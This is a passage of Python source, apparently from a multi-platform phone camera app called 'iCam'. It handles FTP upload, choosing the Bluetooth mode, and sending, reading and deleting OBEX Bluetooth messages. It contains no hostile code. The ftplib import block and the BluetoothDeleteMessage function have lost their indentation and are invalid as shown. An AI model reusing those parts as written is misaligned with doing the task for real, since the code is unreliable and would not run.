            #server.quit()
            server.close()
        #print "Successfully sent the mail to smtp.gmail.com"
    except:
        DebugPrintErrorTrace()
try:
import ftplib
except:
DebugPrint("Cannot import module ftplib.")
DebugPrintErrorTrace()
def UploadByFTP(mediaPathFileName):
    """Upload mediaPathFileName to an FTP server with STOR.

    NOTE(review): ftpURL/ftpUsername/ftpPassword are empty placeholders -
    they must be filled in before this function can actually work.
    """
    # Inspired from [Beazley_2009], Chapter 22
    ftpURL = ""
    ftpUsername = ""
    ftpPassword = ""
    ftpConnection = ftplib.FTP(ftpURL, ftpUsername, ftpPassword)
    fInput = open(mediaPathFileName, "rb")
    try:
        # Send file to the FTP server
        res = ftpConnection.storbinary("STOR " + mediaPathFileName, fInput)
    finally:
        # BUGFIX: the input file was never closed, and the connection was
        # leaked when the transfer raised; release both unconditionally.
        fInput.close()
        # Close the connection
        ftpConnection.close()
#UploadByFTP(mediaPathFileName="./vlc-help_std.txt")
def StoreConfig_CamAutoCfg_WinCE():
    """Persist the video record duration and pause interval to the
    CamAuto.cfg file (space-separated integers), for the WinCE build.
    Errors are logged and swallowed.
    """
    DebugPrint("Entered StoreConfig_CamAutoCfg_WinCE().")
    try:
        cfgFile = open(LOCAL_FOLDER + "/CamAuto.cfg", "wb")
        cfgFile.write("%d %d" % (videoRecordDuration[0], pauseInterval))
        cfgFile.close()
    except:
        DebugPrintErrorTrace()
###############################################################################
###############################################################################
###############################################################################
###############################################################################
##############################Bluetooth########################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
# Human-readable labels for the supported Bluetooth roles; the list index
# doubles as the value stored in the global bluetoothMode.
bluetoothModeList = [u"Bluetooth not used",
                     u"Bluetooth server and Internet proxy mode",
                     u"Bluetooth client mode"] # u"No Bluetooth",
                                               # basestation
# This var is required as global.
# Set True by the save-hook of the Symbian form in SelectBluetoothMode().
bluetoothFormSaved = False
# Handle to the device's Bluetooth inbox (platform specific); assigned
# elsewhere before use.
bluetoothInbox = None
# Uses a Form
def SelectBluetoothMode():
    """Ask the user for the phone's Bluetooth role (off / server+Internet
    proxy / client) via a platform-specific dialog and initialize the
    chosen role.

    Side effects (visible in this body): updates the globals bluetoothMode,
    bluetoothServerAddress, useiCamServer, uploadMediaToYouTube/Picasa,
    persists via StoreState(), may start the BT server
    (BluetoothServerInitialize) or client (BluetoothClientDiscoverServer /
    BluetoothClientInitializeInbox), and restores the app title at the end.
    """
    global bluetoothMode, bluetoothServerAddress
    global bluetoothFormSaved, useiCamServer
    global uploadMediaToYouTube, uploadMediaToPicasa
    """
    Note that myFields contains a combo with values
    frombluetoothModeList, from which we choose the initial value
    the one of index bluetoothMode.
    """
    myFields = [(u"Bluetooth mode for iCam Phone", "combo",
        (bluetoothModeList, bluetoothMode))]
    if ANDROID_OS:
        """
        DisplayNote("Bluetooth functionality not YET implemented for iCam " \
            "for Android!")
        """
        # Android: only the first two modes (off / server) are offered.
        try:
            bluetoothMode = DialogMultipleChoices(myFields[0][0], \
                bluetoothModeList[0:2], int(bluetoothMode))
        except:
            DebugPrintErrorTrace()
    elif SYMBIAN_OS:
        """
        From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
        (and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
        """
        if bluetoothMode == -1:
            """
            bluetoothMode is used as default value index in combo in myFields
            and it has to be >= 0 and < len(bluetoothModeList)
            """
            bluetoothMode = 0
        try:
            # Initialize a boolean variable to know whether the form is saved
            bluetoothFormSaved = False
            appuifw.app.title = u"Bluetooth Intranet"
            # Creates the form
            #bluetoothForm = appuifw.Form(myFields,
            #    flags=appuifw.FFormEditModeOnly)
            bluetoothForm = appuifw.Form(myFields, \
                flags=appuifw.FFormEditModeOnly | appuifw.FFormDoubleSpaced)
            """
            popupMenuList = []
            for i in range(len(bluetoothModeList)):
                if i == bluetoothMode:
                    popupMenuList += [unicode(MENU_SELECT_PREFIX
                                        + bluetoothModeList[i])]
                else:
                    popupMenuList += [unicode(bluetoothModeList[i])]
            resMenu = appuifw.popup_menu(popupMenuList,
                            u"Select phone Bluetooth mode for iCam")
            """
            # bluetoothForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
            # Define a function to be called when the form is saved
            def BluetoothFormSaved(arg):
                global bluetoothFormSaved
                bluetoothFormSaved = True
                return True
            # Assign the save function
            bluetoothForm.save_hook = BluetoothFormSaved
            # Show the form. This operation is blocking until we close the form.
            bluetoothForm.execute()
            # After the form is saved and closed, display the information
            if bluetoothFormSaved == True:
                # print bluetoothForm[0][2]
                """
                The combo form field value is a long integer. We convert it to
                int because we would receive "TypeError: Form combo field,
                bad index" at the next instantiation of appuifw.Form().
                """
                bluetoothMode = int(bluetoothForm[0][2][1])
                # StoreState()
                if bluetoothMode == 0:
                    bluetoothServerAddress = "no_BT"
                    StoreState()
                elif bluetoothMode == 1:
                    bluetoothServerAddress = "BTServer"
                    StoreState()
                    # Spawn a "thread":
                    # global bluetoothServerTimer
                    # bluetoothServerTimer.after(1, BluetoothServer)
                    DebugPrint("SelectBluetoothMode(): Calling " \
                        "BluetoothServerInitialize().")
                    """
                    from threading import Thread
                    bluetoothServerThread = Thread(target = BluetoothServer)
                    bluetoothServerThread.start()
                    #time.sleep(1)
                    """
                    """
                    BluetoothServerInitialize()
                    time.sleep(2)
                    """
                    # """
                    """
                    Does not work on PyS60 1.4.5 - see Weekly snippets
                    Aug 1st, 2010
                    """
                    # thread.start_new_thread(BluetoothServer, ())
                    BluetoothServerInitialize()
                    """
                    This might take a long time to complete, if there are
                    many BT messages in Inbox.
                    """
                    BluetoothMessageListProcess(processJustNonSMF_BtMsgs=True)
                elif bluetoothMode == 2:
                    # This is BT client mode.
                    # time.sleep(1)
                    # e32.ao_sleep(1)
                    # """
                    """
                    To send the media file in the BT message we need to have
                    useiCamServer = 2. Otherwise, we send only the state.
                    """
                    uploadMediaToYouTube = 0
                    uploadMediaToPicasa = 0
                    useiCamServer = 2
                    """
                    We want to ask (in next BluetoothClientDiscoverServer()
                    call) for the server in SelectBluetoothMode().
                    """
                    bluetoothServerAddress = ""
                    BluetoothClientDiscoverServer()
                    BluetoothClientInitializeInbox()
                    StoreState()
                    BluetoothMessageListProcess(processJustNonSMF_BtMsgs=True)
        except:
            DebugPrintErrorTrace()
    """
    finally: # Doesn't work in Python 2.2 (e.g., PyS60 1.4.5)
        appuifw.app.title = ICAM_APP_TITLE
    """
    # Restore the application title whatever happened above.
    appuifw.app.title = ICAM_APP_TITLE
# Counts BT send failures; at a threshold some devices restart the phone
# (see BluetoothUploadBinaryData()).
bluetoothUploadErrorsCounter = 0
# Number of attempts (with exponential backoff) for bt_obex_send_file().
NUM_RETRIES_SEND_VIA_BT = 3
def BluetoothUploadBinaryData(bluetoothRecipientAddress, aData, fileName):
    """Send aData to the BT OBEX server at bluetoothRecipientAddress.

    fileName selects the iCam message type used to build the OBEX file
    name: COMMANDS_FILENAME -> CMD, *.fil -> FIL, known media extension ->
    SMF, None -> TXT. The payload is written to a temporary file (in the
    old format prefixed with a little-endian length dword), then pushed
    with btsocket.bt_obex_send_file() using NUM_RETRIES_SEND_VIA_BT
    retries and exponential backoff. On failure the packet is saved to
    the Unsent folder. Returns 0 on success, -1 on failure.
    On WINDOWS_OS the file is written straight into the virtual
    "recipient" BT inbox folder instead of being sent.
    """
    global bluetoothServerOPPServicePort
    global deviceId
    global bluetoothUploadErrorsCounter
    """
    DebugPrint("Entered BluetoothUploadBinaryData(" \
        "bluetoothRecipientAddress = %s, fileName = %s, " \
        "len(aData) = %d, aData = %s)." % \
        (bluetoothRecipientAddress, fileName, len(aData), aData))
    """
    DebugPrint("Entered BluetoothUploadBinaryData(" \
        "bluetoothRecipientAddress = %s, fileName = %s, " \
        "len(aData) = %d)." % \
        (bluetoothRecipientAddress, fileName, len(aData)))
    try:
        """
        fileName is the name of the file to be sent via BT:
        - COMMANDS_FILENAME
        - with extension .fil
        - media file with extension: ".jpg", ".png", ".3gp", ".mp4".
        if fileName == None --> message is TXT BT message.
        """
        if fileName != None:
            # CMD type
            if fileName == COMMANDS_FILENAME:
                if NEW_BT_FORMAT:
                    btFileName = BT_OBEX_FILENAME_PREFIX + \
                        GetCurrentDateTimeStringWithMilliseconds() + \
                        "_" + deviceId + "_x" + \
                        BT_OBEX_EXTENSION_CMD #EXTENSION_COMMAND_MESSAGE
                    tmpPathFileName = LOCAL_FOLDER + "/" + btFileName
                    #unsentFileName = btFileName + "." + COMMANDS_FILENAME
                    unsentFileName = btFileName
                else:
                    # time.strftime("%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
                    btFileName = BT_OBEX_FILENAME_PREFIX + \
                        BT_OBEX_FILENAME_PREFIX_TYPE_CMD + \
                        GetCurrentDateTimeStringWithMilliseconds()
                    unsentFileName = btFileName + "." + COMMANDS_FILENAME
                    tmpPathFileName = LOCAL_FOLDER + "/" + btFileName
            # FIL type
            elif str.lower(fileName).endswith(EXTENSION_ARBITRARY_FILE):
            # elif fileName.endswith(EXTENSION_ARBITRARY_FILE):
                if NEW_BT_FORMAT:
                    btFileName = BT_OBEX_FILENAME_PREFIX + \
                        GetCurrentDateTimeStringWithMilliseconds() + \
                        "_" + deviceId + "_x" + \
                        EXTENSION_ARBITRARY_FILE
                else:
                    btFileName = BT_OBEX_FILENAME_PREFIX + \
                        BT_OBEX_FILENAME_PREFIX_TYPE_FIL + \
                        GetCurrentDateTimeStringWithMilliseconds()
                unsentFileName = btFileName + EXTENSION_ARBITRARY_FILE
                tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + btFileName
            # SMF type
            #elif str.lower(fileName[-4:]) in [".jpg", ".png", ".3gp", ".mp4"]:
            elif str.lower(fileName[-4:]) in BT_OBEX_EXTENSION_LIST_SMF:
                # iCam_jpg_2010_10_31_...
                # tmpPathFileName will look like iCam_SMF_jpg_2010_10_31_...
                """
                We assume this is a SMF file (the filename can be .jpg, .3gp,
                .mp4, etc). We should check this NOT ASSUME IT!!!!
                """
                #tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
                #    BT_OBEX_FILENAME_PREFIX + fileName
                LEN_EXT_FILENAME = 3
                """
                tmpPathFileName = LOCAL_FOLDER + "/" + \
                    BT_OBEX_FILENAME_PREFIX + fileName[len(fileName) -
                    LEN_EXT_FILENAME : LEN_EXT_FILENAME] + "+" +
                    fileName[0 : len(fileName) - (LEN_EXT_FILENAME + 1)]
                """
                if NEW_BT_FORMAT:
                    # fileName[len(fileName) - LEN_EXT_FILENAME :]
                    #btFileName = fileName[:-4] + "_bt" + fileName[-4:]
                    btFileName = BT_OBEX_FILENAME_PREFIX + \
                        fileName[:len(fileName) - 4] + \
                        fileName[len(fileName) - 4:]
                else:
                    """
                    # time.strftime("%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
                    btFileName = BT_OBEX_FILENAME_PREFIX + \
                        BT_OBEX_FILENAME_PREFIX_TYPE_TXT + \
                        GetCurrentDateTimeStringWithMilliseconds()
                    # time.strftime("%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
                    btFileName = BT_OBEX_FILENAME_PREFIX + \
                        BT_OBEX_FILENAME_PREFIX_TYPE_SMF + \
                        fileName[len(fileName) - 3 : ] + \
                        GetCurrentDateTimeStringWithMilliseconds()
                    """
                    # Old format: extension moved in front of the base name.
                    btFileName = BT_OBEX_FILENAME_PREFIX + \
                        BT_OBEX_FILENAME_PREFIX_TYPE_SMF + \
                        fileName[len(fileName) - LEN_EXT_FILENAME:] + \
                        "_" + fileName[0: len(fileName) - \
                        (LEN_EXT_FILENAME + 1)]
                # btFileName + EXTENSION_STATE_AND_MEDIA_FILE
                unsentFileName = btFileName
                # unsentFileName = btFileName + EXTENSION_STATE_AND_MEDIA_FILE
                tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
                    btFileName
                DebugPrint("BluetoothUploadBinaryData(): btFileName = %s." % \
                    btFileName)
                """
                We want to have the media file at the beginning of aData and
                the state at the end, but UploadStateAndFileAndStoreState()
                puts them in reversed order.
                """
                if NEW_BT_FORMAT:
                    if fileName == COMMANDS_FILENAME:
                        pass
                    else:
                        # Rotate the packet: state trailer moves to the end.
                        myOffset = struct.calcsize(statePackFormat)
                        aData = aData[myOffset:] + aData[0 : myOffset]
            # Unknown type
            else:
                DebugPrint("BluetoothUploadBinaryData(): fileName has " \
                    "unknown extension.")
        else:
            """
            TEXT message (else for "if fileName != None:" above)
            Note that here we create the BT message name.
            """
            if NEW_BT_FORMAT:
                btFileName = BT_OBEX_FILENAME_PREFIX + \
                    GetCurrentDateTimeStringWithMilliseconds() + \
                    "_" + deviceId + "_x" + \
                    BT_OBEX_EXTENSION_TXT #EXTENSION_TEXT_MESSAGE
                unsentFileName = btFileName
            else:
                btFileName = BT_OBEX_FILENAME_PREFIX + \
                    BT_OBEX_FILENAME_PREFIX_TYPE_TXT + \
                    GetCurrentDateTimeStringWithMilliseconds()
                # time.strftime("%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
                unsentFileName = btFileName + EXTENSION_TEXT_MESSAGE
            """
            tmpPathFileName = LOCAL_FOLDER + "/" + BT_OBEX_FILENAME_PREFIX + \
                time.strftime(BT_OBEX_FILENAME_PREFIX_TYPE_TXT +
                    "%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
            """
            tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + btFileName
            if WINDOWS_OS:
                """
                This is just for testing purposes - we do not send via
                BT, but put the file in the virtual "recipient" BT inbox folder
                """
                #tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
                tmpPathFileName = BLUETOOTH_INBOX_PATH + "/" + btFileName
        DebugPrint("BluetoothUploadBinaryData(): tmpPathFileName = %s, " \
            "unsentFileName = %s" % (tmpPathFileName, unsentFileName))
        if NEW_BT_FORMAT:
            aDataBT = aData
        else:
            """
            We add header word with the length of the BT msg (except this word).
            Note that this length dword is added at the
            beginning of the Bluetooth transmission packet, but is not
            added for the Internet transmission.
            """
            """
            IMPORTANT: We require < to specify little endian and ALSO no
            alignment (see http://docs.python.org/library/struct.html)
            """
            aDataBT = struct.pack("<i", len(aData)) + aData
        """
        The name of the file sent is like sLog_2010_10_29_12_56_17_0.jpg or
        sLog_2010_10_29_12_53_33_1.3gp, although the file is not a .jpg or
        .3gp because it contains extra data at the beginning and the
        resulting data is gzipped.
        """
        fOutput = open(tmpPathFileName, "wb")
        fOutput.write(aDataBT)
        fOutput.close()
    except:
        DebugPrintErrorTrace()
        return -1
    # If we make it global func, then it should be passed unsentFileName, aData
    def SaveFileToUnsent():
        # Nested helper: closes over unsentFileName/aData computed above and
        # copies the packet to the Unsent folder (if saving is enabled).
        DebugPrint("Entered SaveFileToUnsent().")
        if saveUnsentPackets == 0:
            return
        try:
            fOutput = open(LOCAL_FOLDER_UNSENT_FILES + "/" + unsentFileName,
                "wb")
            fOutput.write(aData)
            fOutput.close()
        except:
            DebugPrintErrorTrace()
    if bluetoothRecipientAddress not in bluetoothServerOPPServicePort:
        # Check again if the server is on.
        BluetoothClientDiscoverServer()
        if bluetoothRecipientAddress not in bluetoothServerOPPServicePort:
            DebugPrint("BluetoothUploadBinaryData(): bluetooth server does " \
                "not run OPP (OBEX Push Profile) service. Bailing " \
                "out after saving file to Unsent.")
            """
            # Requires backslashes, otherwise btsocket.bt_obex_send_file gives
            # exception: error: (22, 'Invalid argument')
            tmpPathFileNameWithBackslashes = tmpPathFileName.replace("/", "\\")
            MoveFileBetweenAnyDrives(tmpPathFileNameWithBackslashes,
                LOCAL_FOLDER_UNSENT_FILES + "/" + fileName)
            """
            # Erase the file that failed to be sent via BT.
            if os.path.isfile(tmpPathFileName):
                """
                This is not necessary if MoveFileBetweenAnyDrives() is
                successful.
                """
                try:
                    if deviceId not in [IMEI_E7, IMEI_WinOS]:
                    #if deviceId != IMEI_E7:
                        os.unlink(tmpPathFileName)
                except:
                    DebugPrintErrorTrace()
            #sys.stdout.flush()
            SaveFileToUnsent()
            return -1
    DebugPrint("BluetoothUploadBinaryData(): Calling " \
        "bt_obex_send_file(bluetoothRecipientAddress = %s, " \
        "bluetoothServerOPPServicePort[...] = %s, tmpPathFileName = %s)." % \
        (bluetoothRecipientAddress,
        str(bluetoothServerOPPServicePort[bluetoothRecipientAddress]),
        tmpPathFileName))
    resFunc = 0
    if SYMBIAN_OS:
        tmpPathFileNameWithBackslashes = tmpPathFileName.replace("/", "\\")
        for i in range(NUM_RETRIES_SEND_VIA_BT):
            try:
                """
                Requires backslashes, otherwise btsocket.bt_obex_send_file
                gives exception: error: (22, 'Invalid argument')
                """
                btsocket.bt_obex_send_file(bluetoothRecipientAddress,
                    bluetoothServerOPPServicePort[bluetoothRecipientAddress],
                    unicode(tmpPathFileNameWithBackslashes))
                break
            except:
                DebugPrint("BluetoothUploadBinaryData(): Received exception at " \
                    "btsocket.bt_obex_send_file().")
                DebugPrintErrorTrace()
                bluetoothUploadErrorsCounter += 1
                # Do an "exponential backoff" time interval wait
                SleepAndPetWatchdog( int(0.1 * (2**i)) )
        else:
            """
            Executed only if break was not used --> we have reached this only
            if we failed NUM_RETRIES_SEND_VIA_BT times.
            """
            DebugPrint("We failed NUM_RETRIES_SEND_VIA_BT times --> we drop " \
                "this packet and save it to unsent.")
            resFunc = -1
            SaveFileToUnsent()
            """
            MoveFileBetweenAnyDrives(tmpPathFileNameWithBackslashes,
                LOCAL_FOLDER_UNSENT_FILES + "/" + fileName)
            """
            """
            !!!!TODO: Do this only for error:
                (12, 'Not enough space'), then restart phone.
            Apparently?? on Nokia 6680, when this error is received the only
            way to recover is to restart phone (or application!!!!).
            """
            if deviceId == IMEI_6680:
                if bluetoothUploadErrorsCounter >= 15:
                    BluetoothClientDiscoverServer()
                    BluetoothClientInitializeInbox()
                    if len(bluetoothServerOPPServicePort.items()) > 0:
                    #if bluetoothServerOPPServicePort != -1:
                        RestartPhone()
    #elif ANDROID_OS: #!!!!TODO
    # Erase the file sent via BT.
    if os.path.isfile(tmpPathFileName):
        # This is not necessary if MoveFileBetweenAnyDrives() was used.
        try:
            if deviceId not in [IMEI_E7, IMEI_WinOS]:
                os.unlink(tmpPathFileName)
        except:
            DebugPrintErrorTrace()
    #sys.stdout.flush()
    """
    if MY_DEBUG_STDOUT:
        appuifw.note(u"BluetoothUploadBinaryData(): sent %d bytes." % \
            len(aDataBT), "info")
    """
    DebugPrint("BluetoothUploadBinaryData(): sent to %s %d bytes; " \
        "resFunc = %d." % \
        (bluetoothRecipientAddress, len(aDataBT), resFunc))
    return resFunc
# bluetoothClientTimer = e32.Ao_timer()
"""
If fileName is None, then aData is a text message (.txm).
Otherwise, it is a state and media file (.smf).
"""
def BluetoothUploadGZippedData(bluetoothRecipientAddress, aData,
        fileName, newMode=False):
    """Wrap aData in the iCam packet header/footer, gzip it in the old
    format (newMode == False), and send via BluetoothUploadBinaryData().

    fileName == None means a text (.txm) message; otherwise a state and
    media / arbitrary / command payload. Returns the result of
    BluetoothUploadBinaryData(), or -1 on exception.
    NOTE(review): the trailing 'return 0' is unreachable - every path in
    the try returns, and the except returns -1.
    """
    global bluetoothClientTimer
    global address #, services
    global deviceId
    DebugPrint("BluetoothUploadGZippedData(bluetoothRecipientAddress=%s, " \
        "aData, fileName=%s, newMode=%d)" % \
        (bluetoothRecipientAddress, \
        fileName, newMode))
    try:
        """
        DebugPrint("Entered BluetoothUploadGZippedData(" \
            "bluetoothRecipientAddress = %s, fileName = %s)." % \
            (bluetoothRecipientAddress, fileName))
        """
        if newMode:
            # For CMD messages we do NOT add the header
            if fileName == COMMANDS_FILENAME:
                aData = AddPacketHeader(aData)
                #pass
            # For TEXT and FIL messages we add the header
            elif (fileName is None) or \
                    fileName.endswith(EXTENSION_ARBITRARY_FILE):
                aData = AddPacketHeader(aData)
            # For BT SMF messages we add footer
            else:
                #aData = aData + struct.pack(deviceIdFormat, deviceId)
                aData = AddPacketHeader(aData, footer=True)
        else:
            # """
            # add deviceId identifier in front of aData
            # aData = struct.pack("100s", deviceId) + aData
            aData = AddPacketHeader(aData)
        """
        We gzip the data to reduce amount of data uploaded - usually
        good for energy reduction.
        !!!!We should actually specify in the iCam packet if the file is
        encoded or not!!!!
        """
        if newMode == False:
            aData = aData.encode("zlib")
        return BluetoothUploadBinaryData(bluetoothRecipientAddress,
            aData, fileName)
    except:
        DebugPrintErrorTrace()
        return -1
    # print "The address is", address
    # print "The OBEX port value is", services[BT_RFCOMM_SERVICE_NAME]
    # sys.stdout.flush()
    #addressPair = (address, services[BT_RFCOMM_SERVICE_NAME])
    # Reconnecting to the server, etc.
    #bluetoothClientTimer.after(1, BluetoothClient)
    #BluetoothClientDiscoverServer()
    #bluetoothClientTimer.after(1, BluetoothUploadGZippedDataWrapper(aData))
    return 0
"""
BluetoothUploadGZippedDataWrapper = lambda myData: (lambda :
BluetoothUploadGZippedData(myData))
"""
"""
btMsgId is a string for ANDROID_OS, and an integer for SYMBIAN_OS.
"""
# Counts failed bluetoothInbox.delete() calls; 3 failures trigger a phone
# restart (see BluetoothDeleteMessage()).
counterErrorsDeleteBluetoothMessage = 0
# Folder where the OS drops received Bluetooth OBEX files; None when the
# inbox is not directly accessible through the file system.
BLUETOOTH_INBOX_PATH = None
if ANDROID_OS:
    BLUETOOTH_INBOX_PATH = "/mnt/sdcard/bluetooth"
    # Fall back when the SD-card mount point does not exist.
    if not os.path.exists(BLUETOOTH_INBOX_PATH):
        BLUETOOTH_INBOX_PATH = "/bluetooth" #!!!!TODO: think better
elif SYMBIAN_OS:
    if SYMBIAN_3:
        BLUETOOTH_INBOX_PATH = "E:/Received files"
        # This is case for E7. What about others: e.g., N8 - can it be on C:?
    else:
        # Pre-Symbian^3 keeps BT messages in the messaging store, not a folder.
        BLUETOOTH_INBOX_PATH = None
elif RASPBIAN_OS:
    BLUETOOTH_INBOX_PATH = "/home/pi/bluetooth_files/"
#PATH_DELIMITER = "/"
#PATH_DELIMITER = "\\"
"""
putInErrorFolderIfPossible works only where BT messages are DIRECTLY
accessible via the FS (Symbian 3+, Android, NOT Symbian 2nd ed).
"""
def BluetoothDeleteMessage(btMsgId, putInErrorFolderIfPossible=False):
global counterErrorsDeleteBluetoothMessage, bluetoothInbox
if ANDROID_OS or SYMBIAN_3 or WINDOWS_OS or RASPBIAN_OS:
DebugPrint("Entered BluetoothDeleteMessage(btMsgId=%s)." % str(btMsgId))
#return
try:
if putInErrorFolderIfPossible:
btInboxSentToiCamPath = BLUETOOTH_INBOX_PATH + "/BTMessagesError"
else:
#btInboxSentToiCamPath = BLUETOOTH_INBOX_PATH + "/BTMessagesSent"
btInboxSentToiCamPath = BLUETOOTH_INBOX_PATH + "/BTMessagesDone" #"/BTMessagesDeleted"
if not os.path.exists(btInboxSentToiCamPath):
os.makedirs(btInboxSentToiCamPath)
srcPathFileName = BLUETOOTH_INBOX_PATH + "/" + btMsgId
destPathFileName = btInboxSentToiCamPath + "/" + btMsgId
if False: #True:
MoveFileBetweenAnyDrives(srcPathFileName, destPathFileName)
else:
os.unlink(srcPathFileName)
except:
DebugPrintErrorTrace()
elif SYMBIAN_OS:
DebugPrint("Entered BluetoothDeleteMessage(btMsgId=%d)." % btMsgId)
try:
"""
From Logs\Nokia6680\2011_07_07_2\stderr_2011_07_07_11_46_01.txt:
"SymbianError: [Errno -14] KErrInUse"
"""
bluetoothInbox.delete(btMsgId)
except:
counterErrorsDeleteBluetoothMessage += 1
if counterErrorsDeleteBluetoothMessage == 3:
DebugPrint("BluetoothDeleteMessage(): " \
"counterErrorsDeleteBluetoothMessage = %d --> " \
"restarting phone." % \
counterErrorsDeleteBluetoothMessage)
RestartPhone()
"""
!!!!If we receive
"SymbianError: [Errno -14] KErrInUse"
(see http://mobile-revival.110mb.com/ReVival/N95N95N95N95N95/FromPhone/stderr_2011_06_13_10_02_41.txt)
try to Quit() or restart phone.
"""
DebugPrintErrorTrace()
def GetBluetoothMessageName(btMsgId):
    """Return the (file) name of a received Bluetooth message as a string.

    btMsgId is a string (the file name itself) on Android/Raspbian/
    Windows/Symbian^3; on older Symbian it is an integer inbox id and the
    name is fetched via bluetoothInbox.description().

    BUGFIX: res is now pre-initialized, so the function can no longer
    raise NameError if none of the platform flags matches - it falls back
    to the stringified id.
    """
    res = str(btMsgId)
    if ANDROID_OS or RASPBIAN_OS:
        #pathFileNameBluetoothMessage = BLUETOOTH_INBOX_PATH + "/" + btMsgId
        res = str(btMsgId)
    elif SYMBIAN_OS:
        if SYMBIAN_3:
            #pathFileNameBluetoothMessage = BLUETOOTH_INBOX_PATH + "/" + btMsgId
            res = str(btMsgId)
        else: #(S60_EDITION[0] < 3):
            """
            description(btMsgId) returns the name of the file from the BT
            message.
            """
            res = str(bluetoothInbox.description(btMsgId))
    elif WINDOWS_OS:
        res = str(btMsgId)
    return res
def GetBluetoothMessagePathFileName(btMsgId):
    """Return the full path of a received BT message file, or None.

    None is returned on S60 3rd-5th edition (non-Symbian^3) phones, where
    the message attachment path cannot be accessed from Python.

    BUGFIX: res is pre-initialized to None, so an unexpected platform can
    no longer raise NameError; the redundant trailing
    'if res is None: return None' was folded into a single return.
    """
    res = None
    if ANDROID_OS:
        res = BLUETOOTH_INBOX_PATH + "/" + btMsgId
        #res = btMsgId
    elif RASPBIAN_OS:
        res = BLUETOOTH_INBOX_PATH + "/" + btMsgId
    elif WINDOWS_OS:
        res = BLUETOOTH_INBOX_PATH + "/" + btMsgId
    elif SYMBIAN_OS:
        if SYMBIAN_3:
            res = BLUETOOTH_INBOX_PATH + "/" + btMsgId
            #res = btMsgId
        elif S60_EDITION[0] >= 3:
            # S60 3rd-5th ed
            """
            This includes (AFAIR) SYMBIAN_1 phones.
            The following command gives exception KErrNotSupported on
            S60 3+ edition (Symbian v9) - can't access the file
            although it exists (at least when storing messages on
            Mem card...) :(.
            #Will not get the path on S60 3+ edition (Symbian v9).
            pathFileNameBluetoothMessage = bluetoothInbox.attachment_path(btMsgId)
            """
            #!!!! Here we don't have filename so we return None #the int btMsgId
            res = None #btMsgId
        elif S60_EDITION[0] < 3:
            # For S60 2nd edition.
            """
            This should work on S60 2nd edition. However, it will not get the
            path on S60 3+ edition (Symbian v9) - it will generate an exception
            which is normal behavior, so we choose not to report it.
            """
            res = bluetoothInbox.attachment_path(btMsgId)
    return res
#def BluetoothMessageReadData(aBluetoothInbox, btMsgId):
def BluetoothMessageReadData(btMsgId):
    """Read and return the raw bytes of a received Bluetooth message.

    On platforms with a file-system inbox the message file is read
    directly; on S60 3+ Symbian the data is pulled from the messaging
    store in MAX_READ_BT_MESSAGE chunks. Returns None on any error.
    """
    global bluetoothInbox
    btMsgData = None
    DebugPrint("BluetoothMessageReadData(): btMsgId = %s." % (btMsgId))
    """
    #Check that the BT message is sent by an iCam client.
    if fileNameBtMsg[0 : len(BT_OBEX_FILENAME_PREFIX)]
            != BT_OBEX_FILENAME_PREFIX:
        DebugPrint("BluetoothMessageProcessAndDelete(): " \
            "fileNameBtMsg does not start " \
            "with %s. Bailing out without processing " % \
            "or erasing the message..." \
            BT_OBEX_FILENAME_PREFIX)
        return
    """
    if ANDROID_OS or (SYMBIAN_OS and ((S60_EDITION[0] < 3) or SYMBIAN_3)) or \
            WINDOWS_OS or RASPBIAN_OS:
        pathFileNameBluetoothMessage = GetBluetoothMessagePathFileName(btMsgId)
        DebugPrint("BluetoothMessageReadData(): " \
            "pathFileNameBluetoothMessage=%s." % pathFileNameBluetoothMessage)
        try:
            fInput = None
            fInput = open(pathFileNameBluetoothMessage, "rb")
            btMsgData = fInput.read()
            fInput.close()
        except:
            # print(repr(fileNameBtMsg))
            # !!!!Alex
            # print(repr(BTMessageReadFile(fileNameBtMsg)))
            # Always prints "Bluetooth", presumably
            # print(repr(bluetoothInbox.address(btMsgId)))
            DebugPrintErrorTrace()
            btMsgData = None
            if fInput is not None:
                try:
                    fInput.close()
                except:
                    DebugPrintErrorTrace()
    elif SYMBIAN_OS:
        if S60_EDITION[0] >= 3:
            try:
                # MAX_READ_BT_MESSAGE = 512 * 1024
                MAX_READ_BT_MESSAGE = 64 * 1024
                sizeBluetoothMessage = bluetoothInbox.size(btMsgId)
            except:
                """
                Bad BT message.
                I got exception for a few BT messages on N95 transmitted in
                Burst (Turbo) mode from N82. In this case I simply delete
                this message.
                """
                DebugPrintErrorTrace()
                #return ""
                return None
            try:
                DebugPrint("BluetoothMessageReadData(): " \
                    "sizeBluetoothMessage = %d." % sizeBluetoothMessage)
                offsetBluetoothMessage = 0
                dataBluetoothMessage = []
                while offsetBluetoothMessage < sizeBluetoothMessage:
                    numBytesToReadBtMessage = sizeBluetoothMessage - \
                        offsetBluetoothMessage
                    if numBytesToReadBtMessage > MAX_READ_BT_MESSAGE:
                        numBytesToReadBtMessage = MAX_READ_BT_MESSAGE
                    s = bluetoothInbox.data(btMsgId, offsetBluetoothMessage,
                        numBytesToReadBtMessage)
                    offsetBluetoothMessage += len(s)
                    dataBluetoothMessage.append(s)
                # BUGFIX: the join used to run INSIDE the loop, re-joining
                # all chunks on every iteration (accidental O(n^2)). Join
                # once after the loop; guarded so a zero-size message still
                # yields None, exactly as before.
                if dataBluetoothMessage:
                    btMsgData = "".join(dataBluetoothMessage)
            except:
                DebugPrintErrorTrace()
                #return ""
                btMsgData = None
    if btMsgData != None:
        DebugPrint("BluetoothMessageReadData(): len(btMsgData) = %d." % \
            (len(btMsgData)))
    return btMsgData
# Timestamp value unpacked from the state of the last SMF BT message.
btMsgStateTime = None # This is updated in GetInfoFromSMFBtMsg() and used by BluetoothTimeSyncWithDrift(), etc
def GetInfoFromSMFBtMsg(stateMediaData, fileName):
    """Extract metadata from a state-and-media-file (SMF) BT packet.

